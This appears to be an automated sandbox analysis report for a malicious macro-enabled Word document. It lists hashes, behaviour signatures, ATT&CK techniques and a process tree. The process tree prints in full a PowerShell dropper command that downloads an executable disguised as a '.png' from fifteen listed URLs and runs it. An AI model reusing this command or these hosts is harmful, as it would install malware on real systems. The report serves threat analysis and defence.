Overview

overview

10

Static

static

8

DieKlage-0...4.docm

windows7_x64

10

DieKlage-0...4.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    69s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 03:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DieKlage-01092020-1994462004.docm

  • Size

    90KB

  • MD5

    09c2efc28d71216d95c49b33f24af6e3

  • SHA1

    b8b3a9a39486c91222494004ef2498e977ad7524

  • SHA256

    94027e02da7382882c8046e165ba9bdf7b3fc801ecf35ab3f004b1a3fdcc743c

  • SHA512

    be8158bcb2a6adccffd5d5486b0d4c51463df654d017e0ca58466a9d46c9c23a9811200779333d803933c402c8f660200db1e7c5c89796c83e1c4f3ed9ab67a3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rodrigodecamargo.com.br/vhtderi/555555555.png
exe.dropper

http://www.lelamantin.fr/uboljzeqfb/555555555.png
exe.dropper

http://somethingspecialrd.com/emdnfin/555555555.png
exe.dropper

http://www.intiming.it/zopnivucop/555555555.png
exe.dropper

http://funminews.com/tdtmxmcjtkqo/555555555.png
exe.dropper

http://lesehanpelangi.com/vswrdyzgo/555555555.png
exe.dropper

http://anamtaexports.in/gbfrctzj/555555555.png
exe.dropper

http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png
exe.dropper

http://the-lobby.org/xqjzx/555555555.png
exe.dropper

http://www.biocosmeticashop.com/tftkbe/555555555.png
exe.dropper

http://birlafincorp.com/xoygkcfaea/555555555.png
exe.dropper

http://shainasaw.com/bvjlok/555555555.png
exe.dropper

http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png
exe.dropper

http://marudhralive.com/ggyofqrt/555555555.png
exe.dropper

http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DieKlage-01092020-1994462004.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:552
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1360
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd
    Filesize

    24KB

    MD5

    db94c28610cb83c3056f1ae4e3e80463

    SHA1

    174cb2cc87ff32c50b752a94eda80121811014bd

    SHA256

    72223739a61890dac3cef9147aaa16b447d977cdf6ee413535a2826931db2b2d

    SHA512

    f94ec877c58b4c5aa503e2fff42deb8925c17d7fddbf4d10e4856b2254dc81117d0f9a1ec21ed4444a3e90d2c28e86fd1e776448f3aa80cb8977ca7021cb85e9

    Download Submit
  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    Filesize

    74KB

    MD5

    5ba27fb265515da4386aa9c025826e3a

    SHA1

    16a4dfd513bd36714e560a3fcca8c3b846e2da57

    SHA256

    f9655447610215ddd56d097ea5bdeaaa1f7a730d66945c0cc86d8de51c5bb15e

    SHA512

    977e4954d5ec90f2306d34f95fc4898e1309f1272306c3e70616738ef49eb1f53b8689580d8ddffa677f02b68ba90ef4f0ad45456a4e27ac9367f284823819b3

    Download Submit
  • memory/552-58-0x000000007136D000-0x0000000071378000-memory.dmp
    Filesize

    44KB

    Download
  • memory/552-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/552-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/552-57-0x0000000075451000-0x0000000075453000-memory.dmp
    Filesize

    8KB

    Download
  • memory/552-54-0x0000000072901000-0x0000000072904000-memory.dmp
    Filesize

    12KB

    Download
  • memory/552-55-0x0000000070381000-0x0000000070383000-memory.dmp
    Filesize

    8KB

    Download
  • memory/852-69-0x0000000000000000-mapping.dmp
    Download
  • memory/852-74-0x000000000257B000-0x000000000259A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/852-73-0x000000001B6E0000-0x000000001B9DF000-memory.dmp
    Filesize

    3.0MB

    Download
  • memory/852-72-0x0000000002574000-0x0000000002577000-memory.dmp
    Filesize

    12KB

    Download
  • memory/852-71-0x000007FEF38F0000-0x000007FEF444D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1360-61-0x000000006B101000-0x000000006B103000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1360-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1408-67-0x0000000000000000-mapping.dmp
    Download
  • memory/1676-62-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1824-64-0x0000000000000000-mapping.dmp
    Download